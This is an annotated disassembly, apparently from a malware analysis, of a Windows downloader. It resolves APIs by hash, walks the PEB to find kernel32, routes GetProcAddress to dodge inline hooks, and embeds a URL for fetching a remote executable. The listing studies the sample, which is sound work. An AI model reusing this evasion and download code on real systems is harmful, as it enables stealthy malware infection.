Get_EnumWindows:
; Resolve user32!EnumWindows at run time by export-name hash instead of an import entry.
; Shape shared by every Get_* wrapper in this listing:
;   eax  = module base (from the Get<module> helper, which is outside this listing),
;   push <hash>; push eax; call GetAPIFromExport; add esp,8  (caller cleans the 2 args),
;   eax  = resolved address on return.
; The constant is presumably the ROR-13 name hash of "EnumWindows" (the hash loop in
; GetAPIFromExport below uses ror edi,0D); it is not recomputed here.
; NOTE: GetAPIFromExport gives no not-found signal — on a miss eax comes back unchanged,
; i.e. still holding the module base.
0040742B > E8 7EFEFFFF call <GetUser32>          ; eax = user32 base (assumed from helper name)
00407430 68 1A7A1E02 push 21E7A1A                ; arg2: name hash
00407435 50 push eax                             ; arg1: module base
00407436 E8 C2000000 call <GetAPIFromExport>
0040743B 83C4 08 add esp, 8                      ; discard the two arguments
0040743E C3 retn
Get_DestroyWindow:
; Resolve user32!DestroyWindow by export-name hash (same wrapper shape as Get_EnumWindows).
; Out: eax = resolved address; on a miss GetAPIFromExport leaves eax = module base.
; Hash constant presumably = ROR-13 hash of "DestroyWindow" per the label (not recomputed here).
0040743F > E8 6AFEFFFF call <GetUser32>          ; eax = user32 base (assumed from helper name)
00407444 68 E05B3094 push 94305BE0               ; arg2: name hash
00407449 50 push eax                             ; arg1: module base
0040744A E8 AE000000 call <GetAPIFromExport>
0040744F 83C4 08 add esp, 8                      ; discard the two arguments
00407452 C3 retn
Get_GetWindowThreadProcessId:
; Resolve user32!GetWindowThreadProcessId by export-name hash (same wrapper shape as Get_EnumWindows).
; Out: eax = resolved address; on a miss GetAPIFromExport leaves eax = module base.
; Hash constant presumably = ROR-13 hash of "GetWindowThreadProcessId" per the label (not recomputed here).
00407453 > E8 56FEFFFF call <GetUser32>          ; eax = user32 base (assumed from helper name)
00407458 68 97C9E2A3 push A3E2C997               ; arg2: name hash
0040745D 50 push eax                             ; arg1: module base
0040745E E8 9A000000 call <GetAPIFromExport>
00407463 83C4 08 add esp, 8                      ; discard the two arguments
00407466 C3 retn
Get_GetClassNameA:
; Resolve user32!GetClassNameA by export-name hash (same wrapper shape as Get_EnumWindows).
; Out: eax = resolved address; on a miss GetAPIFromExport leaves eax = module base.
; Hash constant presumably = ROR-13 hash of "GetClassNameA" per the label (not recomputed here).
00407467 > E8 42FEFFFF call <GetUser32>          ; eax = user32 base (assumed from helper name)
0040746C 68 6824C5B3 push B3C52468               ; arg2: name hash
00407471 50 push eax                             ; arg1: module base
00407472 E8 86000000 call <GetAPIFromExport>
00407477 83C4 08 add esp, 8                      ; discard the two arguments
0040747A C3 retn
Get_CreateProcessA:
; Resolve kernel32!CreateProcessA by export-name hash (same wrapper shape as Get_EnumWindows,
; but the base comes from Getkernel32 below, which walks the PEB loader list).
; Out: eax = resolved address; on a miss GetAPIFromExport leaves eax = module base.
; Hash constant presumably = ROR-13 hash of "CreateProcessA" per the label (not recomputed here).
0040747B > E8 57000000 call <Getkernel32>        ; eax = kernel32 base (see Getkernel32)
00407480 68 72FEB316 push 16B3FE72               ; arg2: name hash
00407485 50 push eax                             ; arg1: module base
00407486 E8 72000000 call <GetAPIFromExport>
0040748B 83C4 08 add esp, 8                      ; discard the two arguments
0040748E C3 retn
Get_#101Inshdocvw:
; Obtain the address of the function exported by ordinal 101 from shdocvw.dll.
; Because this lookup is by ordinal, this is the only place GetProcAddress is used; when
; calling GetProcAddress an attempt is made to get around anti-overflow detection and
; INLINE HOOKs.  (Original author's comment, translated.)
; Control flow as visible here: the jmp at 00407494 goes to 004074A9, whose `call 00407496`
; pushes 004074AE (the retn at the end of this routine) as return address and enters the
; block at 00407496. That block pushes the GetProcAddress arguments (lpProcName = ordinal
; 0x65 = 101, hModule = eax), then pushes one more value obtained from
; FindRetCodeInkernel32, resolves GetProcAddress and tail-jumps to CallPassingInlineHook.
; FindRetCodeInkernel32, Get_GetProcAddress and CallPassingInlineHook are outside this
; listing, so their contracts are not verified; from the names and the author's comment they
; presumably route the GetProcAddress call through a return site inside kernel32 so that the
; call does not appear to come from this module. Whatever returns to 004074AE returns to
; this routine's caller. Presumed result: eax = address of shdocvw ordinal #101.
0040748F > E8 44FEFFFF call <Getshdocvw>         ; eax = shdocvw base (assumed from helper name)
00407494 EB 13 jmp short 004074A9                ; skip the argument-setup block, enter it via call
00407496 6A 65 push 65                           ; 0x65 = 101: ordinal as lpProcName
00407498 50 push eax                             ; hModule
00407499 E8 F7FBFFFF call <FindRetCodeInkernel32> ; outside listing; presumably a return site in kernel32
0040749E 50 push eax                             ; extra stack slot consumed by CallPassingInlineHook (inferred)
0040749F E8 ABFEFFFF call <Get_GetProcAddress>   ; outside listing; presumably eax = GetProcAddress
004074A4 ^ E9 B7FCFFFF jmp <CallPassingInlineHook> ; tail jump; 004074AE is still on the stack below the args
004074A9 E8 E8FFFFFF call 00407496               ; pushes 004074AE as return address
004074AE C3 retn
Get_URLDownloadToCacheFileA:
; Resolve urlmon!URLDownloadToCacheFileA by export-name hash (same wrapper shape as
; Get_EnumWindows). Together with the URL string in DataArea this is the download capability.
; Out: eax = resolved address; on a miss GetAPIFromExport leaves eax = module base.
; Hash constant presumably = ROR-13 hash of "URLDownloadToCacheFileA" per the label (not recomputed here).
004074AF > E8 A9FDFFFF call <Geturlmon>          ; eax = urlmon base (assumed from helper name)
004074B4 68 4FEF4F05 push 54FEF4F                ; arg2: name hash
004074B9 50 push eax                             ; arg1: module base
004074BA E8 3E000000 call <GetAPIFromExport>
004074BF 83C4 08 add esp, 8                      ; discard the two arguments
004074C2 C3 retn
Get_LoadLibraryA:
; Resolve kernel32!LoadLibraryA by export-name hash (same wrapper shape as Get_EnumWindows).
; Out: eax = resolved address; on a miss GetAPIFromExport leaves eax = module base.
; Hash constant presumably = ROR-13 hash of "LoadLibraryA" per the label (not recomputed here).
004074C3 > E8 0F000000 call <Getkernel32>        ; eax = kernel32 base (see Getkernel32)
004074C8 68 8E4E0EEC push EC0E4E8E               ; arg2: name hash
004074CD 50 push eax                             ; arg1: module base
004074CE E8 2A000000 call <GetAPIFromExport>
004074D3 83C4 08 add esp, 8                      ; discard the two arguments
004074D6 C3 retn
Getkernel32:
; Obtain the base address of kernel32.dll — this part is very common; different code is used
; for WIN9X and for NT and above.  (Original author's comment, translated.)
; In:  nothing.  Out: eax = kernel32 base.  Clobbers: esi, flags.
; NT path: PEB -> Ldr -> InInitializationOrderModuleList, take the DllBase of the SECOND
; entry, i.e. it assumes kernel32 is initialised right after ntdll. On newer Windows the
; second entry is KernelBase.dll rather than kernel32 — a known limitation of this idiom
; that cannot be verified from the listing alone.
; The 3E: (ds:) prefixes are redundant in the flat 32-bit model and do not change behaviour.
004074D7 > 33C0 xor eax, eax
004074D9 64:8B40 30 mov eax, dword ptr fs:[eax+30] ; fs:[30] = PEB pointer on NT
004074DD 85C0 test eax, eax
004074DF 78 10 js short 004074F1                 ; sign bit set -> taken as the Win9x case
004074E1 3E:8B40 0C mov eax, dword ptr [eax+C]   ; PEB.Ldr
004074E5 3E:8B70 1C mov esi, dword ptr [eax+1C]  ; InInitializationOrderModuleList.Flink (1st entry)
004074E9 AD lods dword ptr [esi]                 ; eax = entry->Flink (2nd entry); assumes DF clear
004074EA 3E:8B40 08 mov eax, dword ptr [eax+8]   ; DllBase of that entry (+8 from its init-order link)
004074EE C3 retn
004074EF EB 0B jmp short 004074FC                ; unreachable: follows retn, no jump in this listing targets it
004074F1 3E:8B40 34 mov eax, dword ptr [eax+34]  ; Win9x path: undocumented offsets, not verified here
004074F5 83C0 7C add eax, 7C
004074F8 3E:8B40 3C mov eax, dword ptr [eax+3C]
004074FC C3 retn
GetAPIFromExport:
; Using the DLL module base and the encrypted (hashed) function name, walk the DLL's export
; table to find the API function address; this is also a common module.
; (Original author's comment, translated.)
; C-equivalent: void *GetAPIFromExport(void *base /*[esp+4]*/, uint32_t hash /*[esp+8]*/)
; retn carries no immediate, so the caller removes the 8 bytes of arguments.
; Out: eax = VA of the export whose name hashes to `hash`.
;      On a miss the saved-eax slot is never written, so eax returns as the caller's eax
;      (no error indication).
; Hash: edi = 0; for each byte c up to the NUL: edi = ROR(edi,13) + c  (case-sensitive).
; Register roles (all restored by popad except the eax slot): ebp = module base,
;   edx = export directory VA, ecx = name index, ebx = table currently indexed, esi = name ptr.
; Offsets used: base+3C e_lfanew; PE header+78 = export DataDirectory RVA (PE32);
;   export dir +18 NumberOfNames, +1C AddressOfFunctions, +20 AddressOfNames,
;   +24 AddressOfNameOrdinals.
; Not checked: a zero export-directory RVA, forwarded exports (the AddressOfFunctions entry
;   then points at a forwarder string, not code), or a base that is not a PE image.
; The 36:/3E: (ss:/ds:) prefixes are redundant in the flat model and do not change behaviour.
004074FD > 60 pushad                             ; 32 bytes saved; the eax slot is [esp+1C]
004074FE 36:8B6C24 24 mov ebp, dword ptr [esp+24] ; arg1: module base
00407503 36:8B45 3C mov eax, dword ptr [ebp+3C]  ; e_lfanew
00407507 36:8B5405 78 mov edx, dword ptr [ebp+eax+78] ; export directory RVA
0040750C 03D5 add edx, ebp                       ; -> VA
0040750E 3E:8B4A 18 mov ecx, dword ptr [edx+18]  ; NumberOfNames
00407512 3E:8B5A 20 mov ebx, dword ptr [edx+20]  ; AddressOfNames RVA
00407516 03DD add ebx, ebp                       ; -> VA
00407518 E3 3B jecxz short 00407555              ; no names left -> popad with eax slot untouched
0040751A 49 dec ecx                              ; scan from the last name downwards
0040751B 3E:8B348B mov esi, dword ptr [ebx+ecx*4]
0040751F 03F5 add esi, ebp                       ; esi = name string
00407521 33FF xor edi, edi                       ; running hash
00407523 33C0 xor eax, eax                       ; keep eax's upper bytes 0 so `add edi,eax` adds only al
00407525 FC cld
00407526 AC lods byte ptr [esi]                  ; al = *esi++
00407527 84C0 test al, al
00407529 74 07 je short 00407532                 ; NUL -> compare the finished hash
0040752B C1CF 0D ror edi, 0D
0040752E 03F8 add edi, eax
00407530 ^ EB F4 jmp short 00407526
00407532 36:3B7C24 28 cmp edi, dword ptr [esp+28] ; arg2: wanted hash
00407537 ^ 75 DF jnz short 00407518              ; mismatch -> next (lower) index
00407539 3E:8B5A 24 mov ebx, dword ptr [edx+24]  ; AddressOfNameOrdinals
0040753D 03DD add ebx, ebp
0040753F 66:3E:8B0C4B mov cx, word ptr [ebx+ecx*2] ; ordinal; 16-bit write leaves ecx's upper half as it was (0 unless index > 0xFFFF)
00407544 3E:8B5A 1C mov ebx, dword ptr [edx+1C]  ; AddressOfFunctions
00407548 03DD add ebx, ebp
0040754A 3E:8B048B mov eax, dword ptr [ebx+ecx*4] ; function RVA
0040754E 03C5 add eax, ebp                       ; -> VA
00407550 36:894424 1C mov dword ptr [esp+1C], eax ; overwrite the saved eax = return value
00407555 61 popad
00407556 C3 retn
LastCode:
; Final call; the target 004070C2 is outside this listing. The return address this call
; pushes is 0040755C (this instruction + 5 bytes), which is exactly the start of the string
; in DataArea below, so the callee presumably receives the URL's address as a stack argument
; (call-over-data idiom) rather than ever returning here. Not verifiable without the callee.
00407557 E8 66FBFFFF call 004070C2
DataArea:
; Embedded download URL (indicator of compromise); shown as ASCII by the disassembler, NUL
; termination not visible in this dump.
0040755C ASCII: "http://down.zhahaa.cn/down/new.exe"